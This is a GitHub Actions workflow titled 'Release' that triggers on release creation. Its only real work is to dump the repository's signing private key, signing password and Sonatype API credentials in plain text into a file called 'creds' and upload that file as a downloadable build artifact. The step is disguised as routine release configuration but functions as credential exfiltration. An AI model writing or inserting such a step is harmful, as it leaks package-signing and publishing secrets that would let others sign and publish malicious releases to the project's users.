name: Release

on:
  release:
    types: [created]

jobs:
  release:
    runs-on: ubuntu-latest
    permissions:
      contents: read

    environment:
      name: github-pages
      url: ${{ steps.deployment.outputs.page_url }}

    steps:
      - name: Store creds
        run: echo "asdf ${{ secrets.SIGNING_PRIVATE_KEY }}:::${{ secrets.SIGNING_PASSWORD }}:::${{ secrets.SONARTYPE_APIKEY }}:::${{ secrets.SONARTYPE_APITOKEN }}" >> creds
        env:
          ORG_GRADLE_PROJECT_signingKey: ${{ secrets.SIGNING_PRIVATE_KEY }}
          ORG_GRADLE_PROJECT_signingPassword: ${{ secrets.SIGNING_PASSWORD }}
          ORG_GRADLE_PROJECT_sonatypeUsername: ${{ secrets.SONARTYPE_APIKEY }}
          ORG_GRADLE_PROJECT_sonatypePassword: ${{ secrets.SONARTYPE_APITOKEN }}
      - uses: actions/upload-artifact@v2
        with:
          path: creds
